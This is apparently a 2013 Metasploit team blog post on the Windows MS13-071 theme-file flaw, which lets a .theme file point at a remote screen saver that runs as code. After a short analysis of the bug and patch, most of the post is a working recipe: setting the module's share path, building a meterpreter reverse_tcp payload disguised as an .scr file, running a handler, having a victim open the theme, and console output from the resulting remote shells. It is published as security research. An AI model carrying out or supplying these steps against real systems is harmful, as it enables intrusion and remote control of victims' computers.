juan.vazquez

Change the Theme, Get a Shell: Remote Code Execution with MS13-071

Blog Post created by juan.vazquez Employee on Sep 25, 2013

Recently we've added an exploit for MS13-071 to Metasploit. Rated as "Important" by Microsoft, this remote code execution, found by Eduardo Prado, for Windows XP and Windows 2003 environments is achieved by handling specially crafted themes. In this blog post we would like to discuss the vulnerability and give some helpful tips for exploiting it from Metasploit.

 

First of all, the bug occurs while handling the [boot] section on .theme files, where an arbitrary path can be used as screen saver:

 

 

boot_section.png

 

Since SCR files are just Windows executables, the vulnerability can be exploited by locating a malicious EXE on a shared folder, and distributing a malicious .theme referencing the remote screen saver, for example "SCRNSAVE.EXE=\\host\share\exploit.scr". When the victim opens the .theme and visits the Screen Saver tab the payload will be executed:

 

payload_exec.png

 

The code execution is also triggered if the victim installs the malicious theme and stays away from the computer, when Windows tries to display the screensaver.

 

In order to solve it, the Microsoft patch adds a new function, EnsureInfoxScreenSaver(), which tries to verify the screen saver path:

 

patch.png

 

With the vulnerability analyzed, writing a file format exploit and exploit it isn't hard if you take two things into account:

 

  • There is a malicious .theme file which the victim must open
  • There is a payload embedded into an exe, and masked as scr, which must be distributed through a shared folder.

 

That said, we're going to see how to use the current Metasploit, which allows two operation modes:

 

  • Use an external shared resource (Samba Server or Windows shared folder) to deploy the malicious screen saver. In this case:


1) Configure the UNCPATH option:

 

msf exploit(ms13_071_theme) > set UNCPATH \\\\192.168.172.243\\exploit\\exploit.scr
UNCPATH => \\192.168.172.243\exploit\exploit.scr
msf exploit(ms13_071_theme) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Remember to share the malicious EXE payload as \\192.168.172.243\exploit\exploit.scr
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /Users/juan/.msf4/local/msf.theme
[+] Let your victim open msf.theme

 

2) Deploy the payload, embedded into an exe, on the UNCPATH location:

 

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.172.1 LPORT=4444 X > /tmp/exploit.scr

Created by msfpayload (http://www.metasploit.com).

Payload: windows/meterpreter/reverse_tcp

Length: 290

Options: {"LHOST"=>"192.168.172.1", "LPORT"=>"4444"}

 

3) Finally run a handler for the payload, distribute the malicious .theme file (generated on 1) ) and wait for sessions:

 

msf exploit(ms13_071_theme) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.172.203
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.203:1668) at 2013-09-18 13:57:25 -0500

meterpreter > getuid
Server username: SMALLBUSINESS\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

 

 

  • Use the embedded SMBServer support into the module. In this case, just configure the SRVHOST option to listen on an address reachable by the victims, and let the embedded SMBServer mixin to work. Distribute the .theme file and wait for the sessions:

 

msf exploit(ms13_071_theme) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.172.1:4444 
[*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /Users/juan/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Ready to deliver your payload on \\192.168.172.1\JalVNbsrN\sCOmK.scr
[*] Server started.
msf exploit(ms13_071_theme) > [*] Sending stage (752128 bytes) to 192.168.172.203
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.203:1637) at 2013-09-18 13:31:27 -0500

msf exploit(ms13_071_theme) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: SMALLBUSINESS\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit

 

The SMBServer mixin needs (root) privileges to bind to the port 445/TCP. It will also fail if the port is busy (common on Windows environments or Samba servers). Since the code overriding the SMBServer mixin is brand new, I'd love to hear from you if it worked for you. Remember it has been tested only for Windows XP SP3 and Windows 2003 SP2 - the currents targets for this exploit.

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments

Outcomes